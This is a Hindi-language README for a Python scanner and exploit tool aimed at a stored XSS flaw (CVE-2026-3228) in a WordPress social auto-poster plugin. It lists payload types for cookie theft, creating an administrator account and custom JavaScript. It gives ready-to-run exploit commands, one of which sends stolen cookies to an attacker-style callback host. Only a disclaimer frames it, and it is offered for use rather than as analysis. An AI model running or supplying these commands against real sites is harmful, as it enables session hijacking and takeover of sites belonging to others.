
# CVE-2026-3228 का स्कैन और शोषण NextScripts WordPress प्लगइन में संग्रहीत XSS (CVE-2026-3228) को स्कैन और शोषण करता है, जिसमें प्री-ऑथ डिटेक्शन, प्रमाणित जाँच, और PoC, कुकी चोरी, या एडमिन निर्माण के लिए पेलोड इंजेक्शन शामिल है।
https://img.shields.io/badge/python-3.6+-blue.svg
https://img.shields.io/badge/license-MIT-green
https://img.shields.io/badge/WordPress-Plugin-red
लेखक: NULL200OK
CVE-2026-3228 को स्कैन करने और एक्सप्लॉइट करने के लिए एक व्यापक Python टूल, जो NextScripts: Social Networks Auto-Poster WordPress प्लगइन (संस्करण ≤ 4.4.6) में एक स्टोर्ड क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता है।
यह भेद्यता Contributor-स्तर या उच्चतर पहुँच वाले प्रमाणित उपयोगकर्ताओं को [nxs_fbembed] शॉर्टकोड के माध्यम से मनमाना JavaScript इंजेक्ट करने की अनुमति देती है। जब कोई व्यवस्थापक संक्रमित पोस्ट देखता है, तो स्क्रिप्ट उनके ब्राउज़र में निष्पादित होती है, जिससे संभावित रूप से सत्र अपहरण, व्यवस्थापक खाता निर्माण, या साइट से समझौता हो सकता है।
📦 विशेषताएँ
info – विस्तृत CVE जानकारी प्रदर्शित करें (विवरण, मूल कारण, प्रभाव)।
scan – प्लगइन और उसके संस्करण का पता लगाने के लिए प्री-ऑथेंटिकेशन स्कैन।
check – क्रेडेंशियल्स के साथ व्यापक जाँच (लॉगिन, विशेषाधिकार सत्यापन, संस्करण पहचान)।
exploit – कमजोर शॉर्टकोड का उपयोग करके नई पोस्ट में दुर्भावनापूर्ण XSS पेलोड इंजेक्ट करें।
कई पेलोड प्रकार:
alert – प्रूफ-ऑफ-कॉन्सेप्ट के लिए सरल अलर्ट बॉक्स।
cookie – सत्र कुकीज़ चुराकर कॉलबैक URL पर भेजता है।
admin – नया व्यवस्थापक उपयोगकर्ता बनाने का प्रयास करता है (पेज देखने के लिए व्यवस्थापक की आवश्यकता होती है)।
html – onerror इवेंट्स के साथ बुनियादी HTML इंजेक्शन।
custom – उपयोगकर्ता-आपूर्ति JavaScript।
all – सभी पेलोड प्रकार अलग-अलग पोस्ट में इंजेक्ट करें।
स्वचालित प्रमाणीकरण – WordPress लॉगिन, सत्र प्रबंधन, और nonce निष्कर्षण को संभालता है।
फ़ॉलबैक इंजेक्शन विधियाँ – पहले REST API का प्रयास करता है, फिर पारंपरिक फ़ॉर्म सबमिशन।
उपयोगकर्ता-अनुकूल आउटपुट – रंग-कोडित स्थिति संदेश और स्पष्ट चरण-दर-चरण मार्गदर्शन।
🚨 भेद्यता अवलोकन
CVE ID: CVE-2026-3228
CVSS स्कोर: 6.4 (मध्यम)
प्रभावित प्लगइन: NextScripts: Social Networks Auto-Poster ≤ 4.4.6
मूल कारण:
snapFB पोस्ट मेटा मान का अपर्याप्त इनपुट सैनिटाइज़ेशन।
[nxs_fbembed] शॉर्टकोड रेंडर करते समय अपर्याप्त आउटपुट एस्केपिंग।
आवश्यक विशेषाधिकार: Contributor-स्तर का खाता या उच्चतर।
प्रभाव: एक हमलावर किसी भी उपयोगकर्ता (व्यवस्थापकों सहित) के संदर्भ में मनमाना JavaScript निष्पादित कर सकता है जो संक्रमित पोस्ट देखता है, जिससे साइट का पूर्ण समझौता हो सकता है।
⚙️ आवश्यकताएँ
Python 3.6+
requests
beautifulsoup4
निर्भरताएँ स्थापित करें:
bash
pip install requests beautifulsoup4
🔧 स्थापना
bash
cd CVE-2026-3228
📚 उपयोग
text
usage: CVE-2026-3228.py [-h] {info,scan,check,exploit} ...
CVE-2026-3228 - NextScripts WordPress प्लगइन स्टोर्ड XSS स्कैनर और एक्सप्लॉइट
positional arguments:
{info,scan,check,exploit}
info CVE के बारे में विस्तृत जानकारी प्रदर्शित करें
scan जाँचें कि लक्ष्य कमजोर है या नहीं (प्री-ऑथ)
check क्रेडेंशियल्स के साथ व्यापक जाँच
exploit भेद्यता का एक्सप्लॉइट करें (मान्य क्रेडेंशियल्स की आवश्यकता है)
optional arguments:
-h, --help यह सहायता संदेश दिखाएँ और बाहर निकलें
bash
python3 CVE-2026-3228.py info
bash
python3 CVE-2026-3228.py scan https://example.com
bash
python3 CVE-2026-3228.py check https://example.com -u contributor -p password
बुनियादी अलर्ट पेलोड (PoC)
bash
python3 CVE-2026-3228.py exploit https://example.com -u contributor -p password --payload-type alert
कुकीज़ चुराएँ (लिसनर की आवश्यकता है)
bash
python3 CVE-2026-3228.py exploit https://example.com -u contributor -p password --payload-type cookie --callback-url https://attacker.com/steal
व्यवस्थापक उपयोगकर्ता बनाने का प्रयास करें (जब व्यवस्थापक पेज देखता है)
bash
python3 CVE-2026-3228.py exploit https://example.com -u contributor -p password --payload-type admin
सभी पेलोड प्रकार इंजेक्ट करें
bash
python3 CVE-2026-3228.py exploit https://example.com -u contributor -p password --payload-type all
कस्टम JavaScript
bash
python3 CVE-2026-3228.py exploit https://example.com -u contributor -p password --payload-type custom --custom-js "console.log('pwned')"
🧠 यह कैसे काम करता है (चरण-दर-चरण)
प्रमाणीकरण – स्क्रिप्ट प्रदान किए गए क्रेडेंशियल्स का उपयोग करके WordPress में लॉग इन करती है और सत्र बनाए रखती है।
विशेषाधिकार जाँच – सत्यापित करती है कि लॉग-इन उपयोगकर्ता के पास कम से कम Contributor-स्तर की पहुँच है (पोस्ट बनाने के लिए आवश्यक)।
पेलोड निर्माण – चुने गए प्रकार के आधार पर JavaScript पेलोड बनाती है।
इंजेक्शन – कमजोर [nxs_fbembed] शॉर्टकोड वाली नई पोस्ट बनाती है। दुर्भावनापूर्ण स्क्रिप्ट snapFB पोस्ट मेटा फ़ील्ड में रखी जाती है, जिसे प्लगइन द्वारा ठीक से सैनिटाइज़ नहीं किया जाता है।
भंडारण – पोस्ट प्रकाशित (या ड्राफ्ट के रूप में सहेजी) होती है और पेलोड डेटाबेस में संग्रहीत होता है।
ट्रिगर – जब कोई व्यवस्थापक (या कोई भी उपयोगकर्ता) पोस्ट देखता है, तो असैनिटाइज़्ड स्क्रिप्ट रेंडर होकर उनके ब्राउज़र में निष्पादित होती है।
पोस्ट-एक्सप्लॉइटेशन – पेलोड के आधार पर, हमलावर कुकीज़ चुरा सकता है, व्यवस्थापक खाते बना सकता है, या अन्य क्रियाएँ कर सकता है।
स्क्रिप्ट पहले WordPress REST API के माध्यम से इंजेक्शन का प्रयास करती है (तेज़, स्वच्छ)। यदि यह विफल हो जाता है, तो यह पारंपरिक फ़ॉर्म सबमिशन पर वापस आ जाती है, पोस्ट एडिटर पेज से आवश्यक nonces निकालती है।
⚠️ अस्वीकरण
यह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। उन प्रणालियों के विरुद्ध अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, अवैध है। लेखक (NULL200OK) कोई दायित्व नहीं मानता है और इस स्क्रिप्ट के किसी भी दुरुपयोग या क्षति के लिए ज़िम्मेदार नहीं है।
📄 लाइसेंस
यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है – विवरण के लिए LICENSE फ़ाइल देखें।
📬 संदर्भ
MITRE CVE‑2026‑3228 (प्लेसहोल्डर)
WordPress प्लगइन निर्देशिका
OWASP स्टोर्ड XSS